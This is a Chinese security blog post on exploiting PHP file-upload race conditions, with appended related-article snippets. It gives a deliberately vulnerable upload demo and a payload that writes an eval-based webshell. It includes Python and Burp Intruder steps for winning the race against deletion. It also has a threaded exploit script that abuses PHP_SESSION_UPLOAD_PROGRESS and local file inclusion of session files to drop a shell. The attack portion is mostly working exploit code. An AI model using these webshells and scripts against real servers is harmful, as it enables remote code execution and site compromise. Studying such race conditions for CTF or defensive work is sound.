php条件竞争,文件上传 之 条件竞争

最新推荐文章于 2024-08-13 16:09:27 发布
最新推荐文章于 2024-08-13 16:09:27 发布
阅读量811 收藏
点赞数
文章标签: php条件竞争

测试demo:

enctype="multipart/form-data">

Filename:

if (!empty($_FILES)) {

move_uploaded_file($_FILES['file']['tmp_name'],$_FILES['file']['name']);

unlink($_FILES['file']['name']);

}

?>

shell文件内容:

echo md5(1);

fputs(fopen('shell6666.php','w'),'<?php @eval($_POST[1])?>');

?>

一直访问上传文件的py脚本:

# coding:utf-8

import requests

def main():

i=0

while 1:

try:

print(i,end='\r')

a = requests.get("http://aaa.io/sssss.php")

if "c4ca4238a0b923820dcc509a6f75849b" in a.text:

print("OK")

break

except Exception as e:

pass

i+=1

if __name__ == '__main__':

main()

其中的c4ca4238a0b923820dcc509a6f75849b = md5(1)

burp设置:->发送到Intrudermo模块->

a5df2884503607bd3de89a68df59d9b8.png

d1478b2ddd7bca063fca068682b31b36.png

然后同时运行我们的py脚本,和开启burp爆破,顺序无所谓,差不多挨着时间开启即可。

76cf3eab75d88fff7ae911fdc7c82f19.png

另一个和session文件进行竞争

demo:

if (isset($_GET['file'])) {

include './' . $_GET['file'];

}

这种情况在我们没办法上传文件的时候,怎么利用呢?那就是包含session文件。

我们知道控制session开启的函数session_start(),当没有使用函数的时候怎么办呢?

session下存在upload_progress属性,用来记录文件上传进度,并且默认是开启状态。

4ea878c144b3a29edbade18927945aaa.png

也就是当我们的POST数据包中存在PHP_SESSION_UPLOAD_PROGRESS字段的时候,无需调用session_start()函数,也可初始化session。但是默认会在结尾进行清除,所以我们需要利用条件竞争。

证明的demo:1.php

enctype="multipart/form-data">

Filename:

?>

注意:一定要在前面,不然没办法控制生成的session文件名。

7dbe095418922adb920c4a220d7de9b0.png

漏洞利用脚本:

import io

import requests

import threading

sessid = 'ph1'

def t1(session):

while True:

f = io.BytesIO(b'a' * 1024 * 50)

response = session.post(

'http://localhost/2.php',

data={'PHP_SESSION_UPLOAD_PROGRESS': '=file_put_contents("shell123.php","=phpinfo();?>")?>'},

files={'file': ('a.txt', f)},

cookies={'PHPSESSID': sessid}

)

def t2(session):

while True:

response = session.get(f'http://localhost/2.php?file=../Extensions/tmp/tmp/sess_{sessid}')

print(response.text)

with requests.session() as session:

t1 = threading.Thread(target=t1, args=(session, ))

t1.daemon = True

t1.start()

t2(session)

修改对应的访问路径,和 session文件路径,即可。成功后生成shell123.php文件。

来源:https://www.cnblogs.com/xiaozhiru/p/12639405.html

will.安稳
关注
php竞争条件漏洞
记录并分享学习安全的知识点..
04-23 1044
<?php $filename = $_FILES['file']['name']; $chuhe = substr($filename,strrpos($filename,'.')+1); $path = 'uploads/' . $filename; $tmp = $_FILES['file']['tmp_name']; if(move_uploaded_file($tmp,$path)){ if(!preg_match('/php/i',$chuhe)){ echo 'upload...
文件上传条件竞争绕过
Bu2n的博客
12-30 1293
条件竞争绕过 条件竞争漏洞是服务器端的漏洞,由于服务器端在处理不同的请求时是并发进行的,因此如果并发处理不当或相关操作顺序设计不合理时,将会导致严重的后果 upload-labs 第18关 源码 if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']
php文件包含-条件竞争脚本
读万卷书,行万里路。
08-03 988
0 前言 这次将是最后一篇关于 php文件包含 利用的文章,这几篇文章的内容几乎可以满足绝大多数简单的文件包含题目,以后的文章会更偏向于原理分析、比赛真题、程序分析。 在前面几篇文章中,用了 CTFshow 的几道例题来讲解我使用 php支持的协议 来进行 php文件 的利用,而这篇文章则主要讲解条件竞争的 Python 脚本(比较懒,加上最近事情比较多,介绍条件竞争的博客已经非常多了)。 1 Payload import requests import threading # 攻击目标 HOST = "
护网蓝队中级:各种攻击工具/漏洞流量特征
最新发布
MachineGunJoe666
08-13 928
研判溯源应急准备-检测-抑制-根除-恢复-跟踪总结中级。
PHP文件上传条件竞争(其一)
Elite的博客
04-07 2641
在某些文件上传情境中,后端代码会先保存我们所上传的文件,然后再检查我们上传的文件是否含有风险,如果有的话会被删除,这是我们就需要和删除函数(如unlink()函数)来进行时间与线程上的竞争,争取在删除文件之前访问到该文件,达到攻击效果。
文件上传竞争条件
buffedon的博客
07-27 1750
文件上传竞争条件文件上传竞争条件文件上传过程竞争条件原理竞争条件代码审计竞争条件的利用 文件上传竞争条件 在服务器删除我们上传的非法文件之前,访问这个文件,从而生成另一个木马文件,用这个木马文件getshell 文件上传过程 用户上传文件,服务器获取文件,然后保存临时文件,然后使用移动函数(比如php中的move_uploaded_file() ),才会将文件移动到站点的根目录下面 竞争条件原理 网站允许上传任意文件,然后检测文件中若有webshell,就删除文件;若不是指定类型文件,那么就使用
PHP文件包含漏洞(利用phpinfo)复现&&文件上传(条件竞争)
sinat_61654365的博客
01-11 2385
PHP 环境下,如果网站存在本地文件包含漏洞,但是却无法找到想要包含的文件,也无法生成和上传文件,是否能够获得 WebShell 呢?这里有一个技巧,前提是网站需要有一个 phpinf 页面,就可以通过条件竞争来包含缓存文件获取 WebShell了。这个技巧实际上融合了PHIP 文件包含信息泄露条件竞争这三种漏洞,下面简述一下这种技巧的原理。
第十三节 文件上传-竞争条件-01
09-15
"文件上传-竞争条件" 文件上传是 Web 应用程序中一个常见的功能,但是如果没有正确地实现文件上传功能,可能会导致严重的安全问题。竞争条件(Race Condition)是文件上传中的一种常见的漏洞,攻击者可以利用这个...
文件上传-竞争条件
一米八多的瑞兹的博客
03-12 857
1. 文件上传过程介绍 文件上传过程: 服务器获取文件>>>保存上传临时文件>>>重命名移动临时文件 2. 竞争条件原理介绍 网站逻辑: 1、网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除该文件。 2、网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。 在删除之前访问上传php文件,从而执行上传文件中的php代码。 例如:上传文件代码如下 <?php fputs(fopen('shell.php','w'),
文件上传漏洞 条件竞争 upload-labs 演示案例
qq_55717276的博客
03-20 4419
文件上传漏洞 条件竞争 upload-labs 演示案例
Web攻防:文件上传竞争条件漏洞解析
"Web攻防训练营的第十三节主要探讨了文件上传过程中的竞争条件问题,以及如何利用这种条件实施Webshell攻击。" 在Web应用中,文件上传功能是常见的,但如果不加以妥善处理,可能会成为安全隐患。"竞争条件"(Race ...
PHP代码审计:文件上传(条件竞争绕过)
qq_22132931的博客
11-07 368
PHP代码审计:文件上传(条件竞争绕过)
php条件竞争,挖洞经验 | 利用竞争条件(Race Condition)对目标Web应用实现RCE
weixin_35633340的博客
03-17 255
原标题:挖洞经验 | 利用竞争条件(Race Condition)对目标Web应用实现RCE*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径 本文讲述了作者在某邀请测试项目中,通过对SQL注入和竞争条件(Race Condition)的组合利用,利用上传文件到服务器和服务器转移上传文件到Amazon S3的时间差,最终实现了对目标应用的RCE漏洞。由于该RCE漏洞的发现相对独特,所以作者在本...
php条件竞争漏洞,Web漏洞|条件竞争漏洞
weixin_39669204的博客
03-20 286
竞争条件”是什么?竞争条件发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,但他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果。线程同步机制确保两个及以上的并发进程或线程不同时执行某些特定的程序段,也被称之为临界区(critical section),如果没有应用好同步技术则会发生“竞...
php条件竞争漏洞,CTF中的条件竞争漏洞
weixin_36304806的博客
03-20 536
条件竞争是沃特?敲黑板,定义:竞争条件发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。开发者在进行代码开发时常常倾向于认为代码会以线性的方式执行,而且他们忽视了并行服务器会并发执行多个线程,这就会导致意想不到的结果。线程同步机制确保两个及以上的并发进程或线程不同时执行某些特定的程序段,也被称之为临界区(critical section),如果没有应用好同步技术...
php条件竞争漏洞,代码审计--12--竞争条件漏洞
weixin_30650955的博客
03-20 306
1、漏洞描述漏洞描述:Web 应用程序可以同时处理很多HTTP 请求。开发人员经常在不考虑线程安全的情况下使用变量。从而导致对有些共享资源进行混乱操作,整个业务处理流程改变。在java中比较容易出现条件竞争的问题,很多Servlet开发者常常会忽视一些问题,那就是Servlet实际上是一个单件,除非Servlet实现SingleThreadModel接口。当多线程访问时(即多个用户一起访问时),每...
php竞争问题,结合 CTF 详解条件竞争漏洞
weixin_39655377的博客
03-16 382
什么是条件竞争漏洞?条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。漏洞分析假设有这么一个代码,实现用户上传图片功能if(isset($_GET['src'])){copy($_GET['src'],$_GET['dst']);//...//check fileunlink($_GET...
Web -- 变量覆盖 + php弱类型 + 条件竞争
正在学习的路上...
11-10 309
变量覆盖 + php弱类型 + 条件竞争   第一步构造id 进入 随意写,提交,下载下来,,说太满, 使用Brup Intruder模块,开两个任务,一个上传,一个访问 。 上传: ,,攻击100次。 访问 ,之后和上传步骤一样, 最后先点击上传的Start attack ,然后在点击访问的Start attack。 结果: ,有可能访问那个页面也就是第二张...
WEB攻防-PHP应用&文件上传&函数缺陷&条件竞争&二次渲染&黑白名单&JS绕过
siu~
09-06 347
1、PHP-原生态-文件上传-检测后缀&黑白名单 2、PHP-原生态-文件上传-检测信息&类型内容 3、PHP-原生态-文件上传-函数缺陷&逻辑缺陷 4、PHP-原生态-文件上传-版本缺陷&配置缺陷
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值